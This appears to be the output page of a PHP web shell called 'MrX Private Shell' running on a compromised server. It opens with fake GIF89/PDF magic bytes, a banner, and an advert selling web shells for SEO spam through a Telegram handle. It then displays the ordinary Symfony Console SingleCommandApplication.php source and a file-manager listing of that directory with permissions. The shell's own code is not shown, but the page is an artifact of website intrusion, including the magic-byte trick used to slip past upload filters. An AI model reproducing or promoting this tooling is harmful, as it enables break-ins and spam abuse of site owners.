GIF89; GIF89; %PDF- %PDF-
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/*
* This file is part of the Symfony package.
*
* (c) Fabien Potencier <fabien@symfony.com>
*
* For the full copyright and license information, please view the LICENSE
* file that was distributed with this source code.
*/
namespace Symfony\Component\Console;
use Symfony\Component\Console\Command\Command;
use Symfony\Component\Console\Input\InputInterface;
use Symfony\Component\Console\Output\OutputInterface;
/**
* @author Grégoire Pineau <lyrixx@lyrixx.info>
*/
class SingleCommandApplication extends Command
{
private $version = 'UNKNOWN';
private $autoExit = true;
private $running = false;
/**
* @return $this
*/
public function setVersion(string $version): self
{
$this->version = $version;
return $this;
}
/**
* @final
*
* @return $this
*/
public function setAutoExit(bool $autoExit): self
{
$this->autoExit = $autoExit;
return $this;
}
public function run(InputInterface $input = null, OutputInterface $output = null): int
{
if ($this->running) {
return parent::run($input, $output);
}
// We use the command name as the application name
$application = new Application($this->getName() ?: 'UNKNOWN', $this->version);
$application->setAutoExit($this->autoExit);
// Fix the usage of the command displayed with "--help"
$this->setName($_SERVER['argv'][0]);
$application->add($this);
$application->setDefaultCommand($this->getName(), true);
$this->running = true;
try {
$ret = $application->run($input, $output);
} finally {
$this->running = false;
}
return $ret ?? 1;
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| Attribute | Folder | 0755 |
|
|
| CI | Folder | 0755 |
|
|
| Command | Folder | 0755 |
|
|
| CommandLoader | Folder | 0755 |
|
|
| Completion | Folder | 0755 |
|
|
| DependencyInjection | Folder | 0755 |
|
|
| Descriptor | Folder | 0755 |
|
|
| Event | Folder | 0755 |
|
|
| EventListener | Folder | 0755 |
|
|
| Exception | Folder | 0755 |
|
|
| Formatter | Folder | 0755 |
|
|
| Helper | Folder | 0755 |
|
|
| Input | Folder | 0755 |
|
|
| Logger | Folder | 0755 |
|
|
| Output | Folder | 0755 |
|
|
| Question | Folder | 0755 |
|
|
| SignalRegistry | Folder | 0755 |
|
|
| Style | Folder | 0755 |
|
|
| Tester | Folder | 0755 |
|
|
| Application.php | File | 42.76 KB | 0644 |
|
| Color.php | File | 4.98 KB | 0644 |
|
| ConsoleEvents.php | File | 2.12 KB | 0644 |
|
| Cursor.php | File | 4.03 KB | 0644 |
|
| SingleCommandApplication.php | File | 1.73 KB | 0644 |
|
| Terminal.php | File | 4.86 KB | 0644 |
|
| autoload.php | File | 12.33 KB | 0644 |
|